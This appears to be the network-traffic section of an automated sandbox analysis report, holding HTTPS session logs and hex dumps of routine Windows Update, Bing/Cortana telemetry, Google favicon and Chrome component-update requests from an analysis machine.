                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
                                                                                                                                                    2024-02-21 07:14:12 UTC706INHTTP/1.1 200 OK
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                    Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                    Content-Length: 5430
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Server: sffe
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Date: Wed, 21 Feb 2024 02:44:51 GMT
                                                                                                                                                    Expires: Thu, 29 Feb 2024 02:44:51 GMT
                                                                                                                                                    Cache-Control: public, max-age=691200
                                                                                                                                                    Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                    Content-Type: image/x-icon
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Age: 16161
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close
                                                                                                                                                    2024-02-21 07:14:12 UTC546INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                                                                                    Data Ascii: h& ( 0.v]X:X:rY
                                                                                                                                                    2024-02-21 07:14:12 UTC1252INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 a6 75 ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff 0b be fb ff 05 bc fb ff b6 ec fe ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 aa 7b ff ff ff ff ff fd fd fd f9 fd fd fd db ff ff ff ff 35 c9 fc ff 0a b2 f9 ff 6b a4 f6 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea
                                                                                                                                                    Data Ascii: BBBBBuBBBBB{5k7R8F2Vb5C
                                                                                                                                                    2024-02-21 07:14:12 UTC1252INData Raw: de ee d8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 fe fe fe 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 24 fd fd fd ea ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff eb f5 e7 ff 8f c6 7b ff 54 a9 36 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 7e be 67 ff dd ee d7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 ff ff ff 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd d3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c4 e1 b9 ff 5c ac 3e ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34
                                                                                                                                                    Data Ascii: /${T6S4S4S4S4S4S4S4S4S4~g"\>S4S4S4S4S4S4S4S4S4S4
                                                                                                                                                    2024-02-21 07:14:12 UTC1252INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fa c8 aa ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                    Data Ascii: BBBBBBBBBBB}BBBBBBBBBBB}
                                                                                                                                                    2024-02-21 07:14:12 UTC1128INData Raw: ff ff ff ff a0 a7 f5 ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 81 8a f2 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 0b fd fd fd d5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b5 ba f7 ff 3e 4b eb ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 3f 4c eb ff ba bf f8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 26 fd fd fd eb ff ff ff
                                                                                                                                                    Data Ascii: 5C5C5C5C5C5C5C5C5C5C5C5C5C5C5C>K5C5C5C5C5C5C5C5C5C5C5C5C?L&


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    14192.168.2.54973213.85.23.86443
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:21 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lm7cla3483ezND7&MD=O4BV1say HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                    2024-02-21 07:14:21 UTC560INHTTP/1.1 200 OK
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    Expires: -1
                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                    MS-CorrelationId: 982cb053-f223-471a-b58a-ced477206b82
                                                                                                                                                    MS-RequestId: f6cf5d68-7393-4cb0-aa73-c48b2838a0ba
                                                                                                                                                    MS-CV: IJa6rh2JGUOmYiXJ.0
                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:20 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 24490
                                                                                                                                                    2024-02-21 07:14:21 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                    2024-02-21 07:14:21 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    15192.168.2.54973523.1.237.91443
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:21 UTC2148OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                    Origin: https://www.bing.com
                                                                                                                                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Language: en-CH
                                                                                                                                                    Content-type: text/xml
                                                                                                                                                    X-Agent-DeviceId: 01000A410900D492
                                                                                                                                                    X-BM-CBT: 1696428841
                                                                                                                                                    X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                                    X-BM-DeviceDimensions: 784x984
                                                                                                                                                    X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                                                    X-BM-DeviceScale: 100
                                                                                                                                                    X-BM-DTZ: 120
                                                                                                                                                    X-BM-Market: CH
                                                                                                                                                    X-BM-Theme: 000000;0078d7
                                                                                                                                                    X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                                                    X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                                                                                                                    X-Device-isOptin: false
                                                                                                                                                    X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                    X-Device-OSSKU: 48
                                                                                                                                                    X-Device-Touch: false
                                                                                                                                                    X-DeviceID: 01000A410900D492
                                                                                                                                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                                                                                                                    X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                    X-PositionerType: Desktop
                                                                                                                                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                    X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                    X-Search-SafeSearch: Moderate
                                                                                                                                                    X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                                                                    X-UserAgeClass: Unknown
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                    Host: www.bing.com
                                                                                                                                                    Content-Length: 2484
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1708499629007&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
                                                                                                                                                    2024-02-21 07:14:21 UTC1OUTData Raw: 3c
                                                                                                                                                    Data Ascii: <
                                                                                                                                                    2024-02-21 07:14:21 UTC2483OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                                                                                                    Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                                                                                                    2024-02-21 07:14:21 UTC476INHTTP/1.1 204 No Content
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    X-MSEdge-Ref: Ref A: 161384B5FE1A42C8B2C97B71F26D7175 Ref B: BY3EDGE0311 Ref C: 2024-02-21T07:14:21Z
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:21 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                    X-CDN-TraceID: 0.57ed0117.1708499661.1b5a1983


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    16192.168.2.54973913.85.23.86443
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:15:01 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lm7cla3483ezND7&MD=O4BV1say HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                    2024-02-21 07:15:01 UTC560INHTTP/1.1 200 OK
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    Expires: -1
                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                    ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                                    MS-CorrelationId: 44937d37-52ee-4d79-b579-3c16b7d17eb7
                                                                                                                                                    MS-RequestId: 540be2a4-2fa0-46fe-aa7a-919711213314
                                                                                                                                                    MS-CV: RxNpCubBnkq24kEK.0
                                                                                                                                                    X-Microsoft-SLSClientCache: 2160
                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:15:01 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 25457
                                                                                                                                                    2024-02-21 07:15:01 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                                    Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                                    2024-02-21 07:15:01 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                                    Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    17192.168.2.549740142.250.64.994437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:15:04 UTC1300OUTPOST /service/update2/json?cup2key=13:uJVABRORllRplTCz5XK_8uMYDGrdCFfsvv2k8BIw_4E&cup2hreq=93ca94a466fa1ce5fb584a16b1ad3e9d0805b90aae732883ddc733624cdce7db HTTP/1.1
                                                                                                                                                    Host: update.googleapis.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 3784
                                                                                                                                                    X-Goog-Update-AppId: neifaoindggfcjicffkgpmnlppeffabd,gonpemdgkjcecdgbnaabipppbmgfggbe,ihnlcenocehgdaegdmhbidjhnhdchfmm,hnimpnehoodheedghdeeijklkeaacbdc,obedbbhbpmojnkanicioggnmelmoomoc,gcmjkmgdlgnkkcocmoeiminaijmmjnii,kiabhabjdbkjdpjbpigfodbdjmbglcoo,giekcmmlnklenlaomppkphknjmnnpneh,khaoiebndkojlmppeemjhbpbandiljpe,oimompecagnajdejgnnjijobebaeigek,llkgjffcdpffmhiakmfcdcblohccpfmo,hfnkpimlhhgieaddgfemjhofmfblmnib,laoigpblnllgcgjnjnllmfolckpjlhki,ehgidpndbllacpjalkiimkbadgjfnnmc,efniojlnjndmcbiieegkicadnoecjjef,jflookgnkcckhobaglndicnbbgbonegd,ggkkehgbnfjpeggfpleeakpidbkibbmn,jamhcnnkihinmdlkakkaopbjbbcngflc,ojhpjlocmbogdgmfpkhlaaeamibhnphh,eeigpngbgcognadeebkilcpcaedhellh,cocncanleafgejenidihemfflagifjic
                                                                                                                                                    X-Goog-Update-Interactivity: bg
                                                                                                                                                    X-Goog-Update-Updater: chrome-117.0.5938.132
                                                                                                                                                    Content-Type: application/json
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    2024-02-21 07:15:04 UTC3784OUTData Raw: 7b 22 72 65 71 75 65 73 74 22 3a 7b 22 40 6f 73 22 3a 22 77 69 6e 22 2c 22 40 75 70 64 61 74 65 72 22 3a 22 63 68 72 6f 6d 65 22 2c 22 61 63 63 65 70 74 66 6f 72 6d 61 74 22 3a 22 63 72 78 33 2c 70 75 66 66 22 2c 22 61 70 70 22 3a 5b 7b 22 61 70 70 69 64 22 3a 22 6e 65 69 66 61 6f 69 6e 64 67 67 66 63 6a 69 63 66 66 6b 67 70 6d 6e 6c 70 70 65 66 66 61 62 64 22 2c 22 62 72 61 6e 64 22 3a 22 4f 4e 47 52 22 2c 22 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 55 53 22 2c 22 70 69 6e 67 22 3a 7b 22 72 22 3a 2d 32 7d 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 7d 2c 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 30 2e 30 2e 30 22 7d 2c 7b 22 5f 69 6e 74 65 72 6e 61 6c 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 73 65 74 73 22 3a 22 66 61
                                                                                                                                                    Data Ascii: {"request":{"@os":"win","@updater":"chrome","acceptformat":"crx3,puff","app":[{"appid":"neifaoindggfcjicffkgpmnlppeffabd","brand":"ONGR","enabled":true,"lang":"en-US","ping":{"r":-2},"updatecheck":{},"version":"0.0.0.0"},{"_internal_experimental_sets":"fa
                                                                                                                                                    2024-02-21 07:15:05 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3Phcju4IpIuI_f6RDPnIhw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:15:05 GMT
                                                                                                                                                    X-Cup-Server-Proof: 304402206ed7233a6a2fc6c4c11e77a3a091cc5642096884274edc63d0e21fe46d2b28dd022004c73bb4ca5cc58a890e005dbeceeb17342d4b7827876fc14260f063881a6235:93ca94a466fa1ce5fb584a16b1ad3e9d0805b90aae732883ddc733624cdce7db
                                                                                                                                                    ETag: W/"304402206ed7233a6a2fc6c4c11e77a3a091cc5642096884274edc63d0e21fe46d2b28dd022004c73bb4ca5cc58a890e005dbeceeb17342d4b7827876fc14260f063881a6235:93ca94a466fa1ce5fb584a16b1ad3e9d0805b90aae732883ddc733624cdce7db"
                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                    Content-Length: 22477
                                                                                                                                                    X-Daynum: 6259
                                                                                                                                                    X-Daystart: 83705
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Server: GSE
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close
